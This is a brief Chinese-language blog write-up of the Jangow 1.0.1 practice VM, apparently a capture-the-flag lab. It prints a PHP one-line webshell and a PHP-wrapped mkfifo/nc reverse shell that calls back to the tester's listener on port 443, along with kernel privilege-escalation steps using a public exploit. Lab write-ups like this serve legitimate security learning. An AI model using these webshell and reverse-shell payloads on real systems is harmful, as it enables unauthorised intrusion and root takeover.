萌新的jangow 1.0.1试玩
一、启动环境(下载地址)
还有kali
二、开始操作
nmap扫描
nmap 192.168.31.0/24
扫描全网段
开放了80端口,访问一下
是一个未授权访问,点site进去看看
随便点点找找有没有啥有用的
发现这里似乎可以写参数
发现命令执行漏洞,果断上传一个一句话马,payload:
echo '<?php @eval($_POST['shell']);?>' >> getshell.php
蚁剑连接
逛一逛在home下发现第一个flag
反弹shell
反弹shell(经测试和查攻略,似乎只能监听443端口)
在蚁剑上创建一个文件shell.php,写入<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.183.211 443 >/tmp/f');?>
后保存,然后网页直接访问shell.php,查看kali:
转换为交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
提权
uname -a
查看内核版本
寻找一下内核版本漏洞
searchsploit ubuntu 4.4.0
用红框那个.c文件,把内容写到靶机上,然后提权
gcc 45010.c -o exp #生成可执行文件
chmod +x exp #添加可执行权限
./exp #执行exp文件
执行完之后就提权成功了,id查看一下确实已经是root用户了,去root下找找flag
成功!
总结
非常简单的一个靶场
版权声明:
本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自
永恒的二师兄!
喜欢就支持一下吧